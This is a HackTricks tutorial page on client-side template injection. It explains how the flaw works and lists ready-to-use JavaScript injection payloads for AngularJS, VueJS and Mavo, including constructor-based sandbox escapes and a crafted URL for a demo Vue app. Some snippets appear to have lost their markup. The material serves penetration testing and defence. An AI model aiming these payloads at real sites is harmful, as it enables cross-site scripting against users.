Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
# Summary

It is like [**Server Side Template Injection**](ssti-server-side-template-injection/) but on the **client**. Where **SSTI** can let you **execute code** on the remote server, **CSTI** can let you **execute arbitrary JavaScript** in the victim's browser.

**Testing** for this vulnerability is very similar to the **SSTI** case: the interpreter expects a **template** and executes it. For example, with a payload like `{{ 7-7 }}`, if the application is **vulnerable** you will see `0`, and if not you will see the original: `{{ 7-7 }}`

# AngularJS

AngularJS is a widely used JavaScript framework that interacts with HTML through attributes known as directives, a notable one being **`ng-app`**. This directive allows AngularJS to process the HTML content, enabling the evaluation of JavaScript expressions inside double curly braces.

In scenarios where user input is dynamically inserted into the HTML body tagged with `ng-app`, it is possible to execute arbitrary JavaScript code. This can be achieved by leveraging AngularJS syntax within the input. Below are examples demonstrating how JavaScript code can be executed:

```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
```

You can find a very **basic example** of the vulnerability in **AngularJS** at [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) and in **[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**

{% hint style="danger" %}
[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `` should work.
{% endhint %}

# VueJS

You can find a **vulnerable Vue** implementation at [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Working payload: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)

And the **source code** of the vulnerable example can be found here: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)

```markup
">
aaa
```

## **V3**

A really good post about CSTI in VUE can be found at [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)

```
{{_openBlock.constructor('alert(1)')()}}
```

Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)

## **V2**

```
{{constructor.constructor('alert(1)')()}}
```

Credit: [Mario Heiderich](https://twitter.com/cure53berlin)

**Check more VUE payloads in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)

# Mavo

Payload:

```
[7*7]
[(1,alert)(1)]
{{top.alert(1)}}
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
test
lolxself.alert('lol')lolx
test
[self.alert(1)mod1]
```

**More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)

# **Brute-Force Detection List**

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}